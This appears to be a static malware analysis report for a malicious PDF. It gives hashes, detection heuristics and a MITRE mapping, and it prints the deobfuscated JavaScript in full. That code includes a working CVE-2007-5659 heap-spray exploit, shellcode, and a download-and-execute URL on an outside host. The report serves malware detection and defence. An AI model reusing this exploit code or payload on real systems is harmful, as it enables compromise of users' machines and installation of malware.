Malicious PDF — malware analysis report

Static analysis result for SHA-256 85978d083bb68fc6…

MALICIOUS

PDF

8.4 KB First seen: 2026-05-08
MD5: 858d3b02c0e5160a441ae419b2b7cd71 SHA-1: 4b00e69db4cfdc5d4950df13980ed925623a132c SHA-256: 85978d083bb68fc6fef30f103585b5ac47ea69984975f792d60a2dbe04791df7
266 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed to download a second-stage payload from the embedded URL 'http://rebulkinc.com/cgi-bin/ca7/z002106201r0019R7516ac91X43d189fcY3af6b022Z0100f060'. The use of String.fromCharCode and obfuscation techniques within the JavaScript indicates an attempt to conceal malicious activity.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var ic_j_3_O7_8_S = new Array();var qN403__d = 0;var J__mG_c_U_k0Ks = "";function anmY_oI__5_tr2g(g7_rM3t, KrRRa4E_i0){var S__S_E = KrRRa4E_i0.toString();var Uuds6Bt_G0_U = "";for(var OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < S__S_E.length; OoGoU_4_5spFnuU++) {var f__I8J7_Y3k0W0s = parseInt(S__S_E.substr(OoGoU_4_5spFnuU, 1));if (!isNaN(f__I8J7_Y3k0W0s)) {f__I8J7_Y3k0W0s = f__I8J7_Y3k0W0s.toString(16);if (f__I8J7_Y3k0W0s.length == 1) { f__I8J7_Y3k0W0s = "0" + f__I8J7_Y3k0W0s; }else if (f__I8J7_Y3k0W …
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://rebulkinc.com/cgi-bin/ca7/z002106201r0019R7516ac91X43d189fcY3af6b022Z0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1C55 1862 bytes
SHA-256: f77163af9c1f6e78aa6cd9f9811c28d2e382c4b135aa0b23264d0f5931969574
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function SI__8__dy(N6_buB4V8gB3h, UF___6y_Xx_j){var pp_4U_Kb_J = 0;var l67tr3Uj = 4;var K_W43_q__4FB8a = new Array();var LsE1_u_g_0d = new Array(107,256,101,  512, 106, 126,  44,405, 142);var Q5w7_tX5wxKUy = "";LsE1_u_g_0d[5] -= 103;try {var ukqrO_0__415 = 0;if (app) {UF___6y_Xx_j = pr[ukqrO_0__415].subject;}} catch(e) {}pp_4U_Kb_J = this;if (!N6_buB4V8gB3h) { K_W43_q__4FB8a[0] = 0;K_W43_q__4FB8a[1] = K_W43_q__4FB8a[0];K_W43_q__4FB8a[2] = K_W43_q__4FB8a[1];K_W43_q__4FB8a[3] = K_W43_q__4FB8a[2];var avec5yIOF_d_4 = LsE1_u_g_0d[6] + 3;var d8I260_2N_E = avec5yIOF_d_4 + 11;var vQiui_g = SI__8__dy;var WdR_Qj66gik2_Q6 = 0;vQiui_g = vQiui_g.toString();for(var Iq_5Sqpd1__X = 0; Iq_5Sqpd1__X < vQiui_g.length; Iq_5Sqpd1__X++) {var C_r_r8iiP = vQiui_g.charCodeAt(Iq_5Sqpd1__X);if (C_r_r8iiP > avec5yIOF_d_4 && C_r_r8iiP < d8I260_2N_E) {if (WdR_Qj66gik2_Q6 == 4) {WdR_Qj66gik2_Q6 = 0;}K_W43_q__4FB8a[WdR_Qj66gik2_Q6] += C_r_r8iiP;if (K_W43_q__4FB8a[WdR_Qj66gik2_Q6] > LsE1_u_g_0d[3]) {K_W43_q__4FB8a[WdR_Qj66gik2_Q6] -= 512;}WdR_Qj66gik2_Q6++;}}}else  { K_W43_q__4FB8a = N6_buB4V8gB3h;}for (var QG4Q86 = 0; QG4Q86 < 4; QG4Q86++) {if (K_W43_q__4FB8a[QG4Q86] > LsE1_u_g_0d[1]) {K_W43_q__4FB8a[QG4Q86] -= LsE1_u_g_0d[1];}}var n___v4_8YbS2 = 0;var KRt2_1_Nu__jeq6 = 0;var eOU2S_J;var OC_Kws17Q_ce = 0;while ( n___v4_8YbS2 < UF___6y_Xx_j.length ) {var Iohc8m7_IF_H__V = "";Iohc8m7_IF_H__V = UF___6y_Xx_j.substr(n___v4_8YbS2, 2);var A_xVQ2ss_U = parseInt(Iohc8m7_IF_H__V, LsE1_u_g_0d[5]); if (KRt2_1_Nu__jeq6 == 4) {KRt2_1_Nu__jeq6 = 0;}A_xVQ2ss_U -= (OC_Kws17Q_ce + 2) * K_W43_q__4FB8a[KRt2_1_Nu__jeq6];if (A_xVQ2ss_U < 0) {A_xVQ2ss_U -= Math.floor(A_xVQ2ss_U / LsE1_u_g_0d[1]) * LsE1_u_g_0d[1];}Q5w7_tX5wxKUy += String.fromCharCode(A_xVQ2ss_U);{n___v4_8YbS2 += 2;OC_Kws17Q_ce++;KRt2_1_Nu__jeq6++;}}pp_4U_Kb_J["eval"](Q5w7_tX5wxKUy);return 0;}

	SI__8__dy(0);
legacy_pdfkit_stage_001.js deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x4BB 5087 bytes
SHA-256: 4f06aad5d1cdda3613e3c0479bab1a40248a25f6fcc0855811cd30ac7b7b48f5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var ic_j_3_O7_8_S = new Array();var qN403__d = 0;var J__mG_c_U_k0Ks = "";function anmY_oI__5_tr2g(g7_rM3t, KrRRa4E_i0){var S__S_E = KrRRa4E_i0.toString();var Uuds6Bt_G0_U = "";for(var OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < S__S_E.length; OoGoU_4_5spFnuU++) {var f__I8J7_Y3k0W0s = parseInt(S__S_E.substr(OoGoU_4_5spFnuU, 1));if (!isNaN(f__I8J7_Y3k0W0s)) {f__I8J7_Y3k0W0s = f__I8J7_Y3k0W0s.toString(16);if (f__I8J7_Y3k0W0s.length == 1) { f__I8J7_Y3k0W0s = "0" + f__I8J7_Y3k0W0s; }else if (f__I8J7_Y3k0W0s.length != 2) { f__I8J7_Y3k0W0s = "00"; }Uuds6Bt_G0_U = f__I8J7_Y3k0W0s + Uuds6Bt_G0_U;}}while(Uuds6Bt_G0_U.length < 8) { Uuds6Bt_G0_U = "0" + Uuds6Bt_G0_U; }var XTqat_h = g7_rM3t.toString(16);if (XTqat_h.length == 1) { XTqat_h = "0" + XTqat_h; }else if (XTqat_h.length != 2) { XTqat_h = "00"; }Uuds6Bt_G0_U = "3" + XTqat_h + "P" + Uuds6Bt_G0_U;return Uuds6Bt_G0_U;}function L7a_lfu5(Cf57X2x, Up7XnQS_707Imv){var B4De1jl6lA_y = new Array("");var cn36GkNaWp = Cf57X2x;var C__Qi28q;if ((C__Qi28q = Cf57X2x.lastIndexOf("%u00")) != -1) {if (C__Qi28q + 6 == Cf57X2x.length) {B4De1jl6lA_y[0] = Cf57X2x.substr(C__Qi28q + 4, 2);cn36GkNaWp = Cf57X2x.substring(0, C__Qi28q);}}C__Qi28q = 1;for (OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < Up7XnQS_707Imv.length; OoGoU_4_5spFnuU++) {var Clgt3Y_8cjh = Up7XnQS_707Imv.charCodeAt(OoGoU_4_5spFnuU).toString(16);if (Clgt3Y_8cjh.length == 1) { Clgt3Y_8cjh = "0" + Clgt3Y_8cjh; }B4De1jl6lA_y[C__Qi28q] = Clgt3Y_8cjh;C__Qi28q++;}OoGoU_4_5spFnuU = B4De1jl6lA_y[0].length ? 0 : 1;B4De1jl6lA_y[C__Qi28q] = "00";B4De1jl6lA_y[C__Qi28q + 1] = "00";C__Qi28q += 2;if ((B4De1jl6lA_y.length - OoGoU_4_5spFnuU) % 2) {B4De1jl6lA_y[C__Qi28q] = "00";}while(OoGoU_4_5spFnuU < B4De1jl6lA_y.length) {cn36GkNaWp += "%u" + B4De1jl6lA_y[OoGoU_4_5spFnuU + 1] + B4De1jl6lA_y[OoGoU_4_5spFnuU];OoGoU_4_5spFnuU += 2;}cn36GkNaWp += "%u0000";return cn36GkNaWp;}function oKNBYW_C5V(r4_xE6V_qr8_7_j, bb_PviR7_W){while (r4_xE6V_qr8_7_j.length*2<bb_PviR7_W) {r4_xE6V_qr8_7_j += r4_xE6V_qr8_7_j;}r4_xE6V_qr8_7_j = r4_xE6V_qr8_7_j.substring(0,bb_PviR7_W/2);return r4_xE6V_qr8_7_j;}function w0cE4__YL7(S__In_d, I_dS_F, q3qm_h_F){var hVa4LiP3y__qxoY = 0x0c0c0c0c;var r4_xE6V_qr8_7_j = unescape(I_dS_F);var Up7XnQS_707Imv = anmY_oI__5_tr2g(S__In_d, q3qm_h_F);var BpV_0u8__T8R = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var Cf57X2x = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7270%u4c69%u0064%u7468%u7074%u2f3a%u722f%u6265%u6c75%u696b%u636e%u632e%u6d6f%u632f%u6967%u622d%u6e69%u632f%u3761%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u3752%u3135%u6136%u3963%u5831%u3334%u3164%u3938%u6366%u3359%u6661%u6236%u3230%u5a32%u3130%u3030%u3066%u3036";app.Lmmh_8i_5 = unescape(L7a_lfu5(Cf57X2x, Up7XnQS_707Imv));var eD3x_f = 0x400000;var hd1XQ42_DcH = BpV_0u8__T8R.length * 2;var bb_PviR7_W = eD3x_f - (hd1XQ42_DcH+0x38);r4_xE6V_qr8_7_j = oKNBYW_C5V(r4_xE6V_qr8_7_j, bb_PviR7_W);var BpP4Y_h_X_Mj = (hVa4LiP3y__qxoY - 0x400000)/eD3x_f;for (var i7Q_D6_7KRw = 0; i7Q_D6_7KRw < BpP4Y_h_X_Mj; i7Q_D6_7KRw++) {ic_j_3_O7_8_S[i7Q_D6_7KRw] = r4_xE6V_qr8_7_j + BpV_0u8__T8R;}}function e40u_1_1w__h(){var m7_I_qpx = "";for (OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < 12; OoGoU_4_5spFnuU++) {m7_I_qpx += unescape("%u0c0c%u0c0c");}var cLUq7i_0e_2pM3q = "";for (OoGoU_4_5spFnuU = 0; OoGoU_4_5spFnuU < 750; OoGoU_4_5spFnuU++) {cLUq7i_0e_2pM3q += m7_I_qpx;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: cLUq7i_0e_2pM3q});app.clearTimeOut(qN403__d);}function ntP__7Phuj(F___LV){var r_MGB___CJ___8 = qN403__d;if ((F___LV >= 8 && F___LV < 8.11) || F___LV < 7.1) {w0cE4__YL7(23, "%u0c0c%u0c0c", F___LV);e40u_1_1w__h();}if (r_MGB___CJ___8) {app.clearTimeOut(r_MGB___CJ___8);}}var q3qm_h_F = 0;var f1Fa_o = app.plugIns;for (var an2_oQU_i5o8s = 0; an2_oQU_i5o8s < f1Fa_o.length; an2_oQU_i5o8s++) {var u_6FuWCXg = f1Fa_o[an2_oQU_i5o8s].version;if (u_6FuWCXg > q3qm_h_F) { q3qm_h_F = u_6FuWCXg; }}if (app.viewerVersion == 9.103 && q3qm_h_F < 9.13) {q3qm_h_F = 9.13;}app.k_2M6_V = ntP__7Phuj;qN403__d = app.setTimeOut("app.k_2M6_V(" + q3qm_h_F.toString() + ")", 50);

Open this report in the interactive analyzer, or submit your own file for analysis.